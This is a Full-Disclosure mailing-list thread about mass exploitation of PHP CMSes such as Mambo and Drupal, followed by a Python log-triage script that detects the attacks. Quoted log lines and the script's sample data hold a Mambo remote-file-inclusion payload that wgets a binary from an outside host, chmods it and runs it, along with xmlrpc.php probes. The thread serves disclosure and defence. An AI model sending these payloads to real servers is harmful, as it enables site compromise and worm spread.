
| Subject: | RE: [Full-disclosure] PHP-based CMS mass-exploitation |
|---|---|
| Date: | Wed, 08 Mar 2006 12:24:55 -0700 |
This is a Mambo-based exploit. There are Linux-based worm variants which compromise a site running a vulnerable version of Mambo and then execute a malicious Perl script which in turn attempts to exploit remote sites.

Harry
-------- Original Message --------
Subject: [Full-disclosure] PHP-based CMS mass-exploitation
From: "Daniel Bonekeeper" <thehazard@gmail.com>
Date: Tue, March 07, 2006 8:56 am
To: bugtraq@securityfocus.com, bugs@securitytracker.com, news@securiteam.com, full-disclosure@lists.grok.org.uk, vuln@secunia.com

This is not the first time that we see this kind of "attack", but in recent days I've noticed these requests on my webservers with considerable frequency:

83.84.14X.XXX - - [06/Mar/2006:18:18:12 -0500] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://163.24.84.10/heade.gif?&cmd=cd%20/tmp;wget%20163.24.84.10/chspsp;chmod%20744%20chspsp;./chspsp;echo%20YYY;echo| HTTP/1.1" 404 8696 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
83.84.14X.XXX - - [06/Mar/2006:18:18:13 -0500] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://163.24.84.10/heade.gif?&cmd=cd%20/tmp;wget%20163.24.84.10/chspsp;chmod%20744%20chspsp;./chspsp;echo%20YYY;echo| HTTP/1.1" 200 10110 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
83.84.14X.XXX - - [06/Mar/2006:18:18:14 -0500] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://163.24.84.10/heade.gif?&cmd=cd%20/tmp;wget%20163.24.84.10/chspsp;chmod%20744%20chspsp;./chspsp;echo%20YYY;echo| HTTP/1.1" 404 8696 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
83.84.14X.XXX - - [06/Mar/2006:18:18:15 -0500] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://163.24.84.10/heade.gif?&cmd=cd%20/tmp;wget%20163.24.84.10/chspsp;chmod%20744%20chspsp;./chspsp;echo%20YYY;echo| HTTP/1.1" 404 8696 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
83.84.14X.XXX - - [06/Mar/2006:18:18:17 -0500] "GET /articles/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://163.24.84.10/heade.gif?&cmd=cd%20/tmp;wget%20163.24.84.10/chspsp;chmod%20744%20chspsp;./chspsp;echo%20YYY;echo| HTTP/1.1" 404 8696 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
83.84.14X.XXX - - [06/Mar/2006:18:18:18 -0500] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://163.24.84.10/heade.gif?&cmd=cd%20/tmp;wget%20163.24.84.10/chspsp;chmod%20744%20chspsp;./chspsp;echo%20YYY;echo| HTTP/1.1" 404 8696 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
83.84.14X.XXX - - [06/Mar/2006:18:18:19 -0500] "POST /xmlrpc.php HTTP/1.1" 200 375 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
83.84.14X.XXX - - [06/Mar/2006:18:18:20 -0500] "POST /blog/xmlrpc.php HTTP/1.1" 404 8696 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
83.84.14X.XXX - - [06/Mar/2006:18:18:21 -0500] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 8696 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
83.84.14X.XXX - - [06/Mar/2006:18:18:22 -0500] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 8696 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
83.84.14X.XXX - - [06/Mar/2006:18:18:23 -0500] "POST /drupal/xmlrpc.php HTTP/1.1" 404 8696 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
83.84.14X.XXX - - [06/Mar/2006:18:18:25 -0500] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 8696 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
83.84.14X.XXX - - [06/Mar/2006:18:18:26 -0500] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 8696 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
83.84.14X.XXX - - [06/Mar/2006:18:18:27 -0500] "POST /xmlrpc.php HTTP/1.1" 200 375 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
83.84.14X.XXX - - [06/Mar/2006:18:18:28 -0500] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 8696 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
83.84.14X.XXX - - [06/Mar/2006:18:18:29 -0500] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 8696 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

All of them, as we can see, are exploitation attempts against known buggy pages (like the newest Mambo bug, the old XMLRPC problem with old versions of Drupal, etc). I guess that they are getting a list of domain names and trying them out with those vulns, and I believe that they may already have some thousands of vulnerable machines in their hands. Such attacks might be enhanced by using Google to guess which domains are using which CMS... for example, searching Google for "A password and instructions will be sent to this e-mail address, so make sure it is accurate." will return a bunch of Drupal websites (88,500 according to Google, even though we can see just the first 1000).

This is just a piece of advice for all admins that use those CMS: keep, as always, your CMS updated (almost every two weeks there are new vulns disclosed), and also check if you already got caught by that, if you're running old software.

--
# (perl -e "while (1) { print "\x90"; }") | dd of=/dev/evil

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
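The log lines quoted in the thread are easy to triage mechanically. The script below is an added example, not code from the post or from the Mambo project: it parses Apache combined-format lines, flags (a) a `mosConfig_absolute_path` parameter set to an off-host URL (the Mambo remote-file-inclusion string in the post), (b) a `cmd=` value carrying shell metacharacters and a fetch-and-run chain, and (c) POSTs to any path ending in `xmlrpc.php`, then groups hits per client IP and records which flagged requests got a 200. The sample lines are taken from the post (with its masked IP) plus one constructed benign line; that the remote `heade.gif` is what executes the `cmd` value is an assumption of mine, not stated in the post.

```python
"""Triage Apache access-log lines for the Mambo RFI / xmlrpc.php scanning
traffic from the post.  Added example; not code from the post or from Mambo."""
import re
from collections import defaultdict
from urllib.parse import unquote, urlsplit

# Apache "combined" format: ip ident user [ts] "METHOD target proto" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "[^"]*" "(?P<ua>[^"]*)"$'
)
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
# "wget host/file" style fetch inside a shell chain; stop at shell separators.
FETCH_RE = re.compile(r'\b(?:wget|curl|fetch|lynx)\s+(?:-\S+\s+)*([^\s;|&`\'"]+)')
SHELL_META = set(';|`$')

# Lines 1-3 are from the post (IP masked as the post masked it); line 4 is the
# post's first xmlrpc.php POST; line 5 is a constructed benign request.
SAMPLE_LOG = [
    '83.84.14X.XXX - - [06/Mar/2006:18:18:12 -0500] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://163.24.84.10/heade.gif?&cmd=cd%20/tmp;wget%20163.24.84.10/chspsp;chmod%20744%20chspsp;./chspsp;echo%20YYY;echo| HTTP/1.1" 404 8696 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"',
    '83.84.14X.XXX - - [06/Mar/2006:18:18:13 -0500] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://163.24.84.10/heade.gif?&cmd=cd%20/tmp;wget%20163.24.84.10/chspsp;chmod%20744%20chspsp;./chspsp;echo%20YYY;echo| HTTP/1.1" 200 10110 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"',
    '83.84.14X.XXX - - [06/Mar/2006:18:18:14 -0500] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://163.24.84.10/heade.gif?&cmd=cd%20/tmp;wget%20163.24.84.10/chspsp;chmod%20744%20chspsp;./chspsp;echo%20YYY;echo| HTTP/1.1" 404 8696 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"',
    '83.84.14X.XXX - - [06/Mar/2006:18:18:19 -0500] "POST /xmlrpc.php HTTP/1.1" 200 375 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"',
    '10.0.0.5 - - [06/Mar/2006:18:20:00 -0500] "GET /index.php?option=com_content&task=view&id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]


def parse_query(query):
    """Split on '&' only: parse_qsl() also splits on ';' in older Pythons,
    which would shred exactly the shell payload we want to inspect."""
    params = defaultdict(list)
    for pair in query.split('&'):
        if pair:
            key, _, value = pair.partition('=')
            params[unquote(key)].append(unquote(value))
    return params


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    entry = m.groupdict()
    parts = urlsplit(entry['target'])
    entry['path'] = parts.path
    entry['params'] = parse_query(parts.query)
    return entry


def classify(entry):
    """Return (tags, iocs) for a parsed entry; tags is empty for benign traffic."""
    tags, iocs = [], {}
    params = entry['params']
    # (a) Mambo RFI: mosConfig_absolute_path pointing at a remote URL.
    for value in params.get('mosConfig_absolute_path', []):
        if REMOTE_URL_RE.match(value):
            tags.append('mambo_rfi')
            iocs['include_url'] = value
    # (b) Shell chain in cmd= (assumed to be run by the included remote file).
    for value in params.get('cmd', []):
        if SHELL_META & set(value):
            tags.append('cmd_injection')
            iocs['shell'] = value
            iocs['payload_urls'] = FETCH_RE.findall(value)
    # (c) XML-RPC probing: POST to any .../xmlrpc.php.
    if entry['method'] == 'POST' and entry['path'].rsplit('/', 1)[-1] == 'xmlrpc.php':
        tags.append('xmlrpc_probe')
    return tags, iocs


def triage(lines):
    """Group flagged requests per client IP.  A flagged request answered with
    200 means the target page exists and the host needs follow-up (e.g. look
    in /tmp for the file named in the wget); a 404 is only a probe."""
    report = defaultdict(lambda: {'hits': 0, 'tags': set(), 'hit_200': [],
                                  'payload_urls': set(), 'include_urls': set()})
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        tags, iocs = classify(entry)
        if not tags:
            continue
        rec = report[entry['ip']]
        rec['hits'] += 1
        rec['tags'].update(tags)
        if entry['status'] == '200':
            rec['hit_200'].append(entry['path'])
        rec['payload_urls'].update(iocs.get('payload_urls', []))
        if 'include_url' in iocs:
            rec['include_urls'].add(iocs['include_url'])
    return dict(report)


if __name__ == '__main__':
    for ip, rec in triage(SAMPLE_LOG).items():
        print(ip, rec)
```

Feed it `sys.stdin` or an open access log instead of `SAMPLE_LOG` to run it on real data; the per-IP `include_urls` and `payload_urls` sets are the indicators worth blocking at the egress proxy, since the dropped binary is fetched by the web server itself.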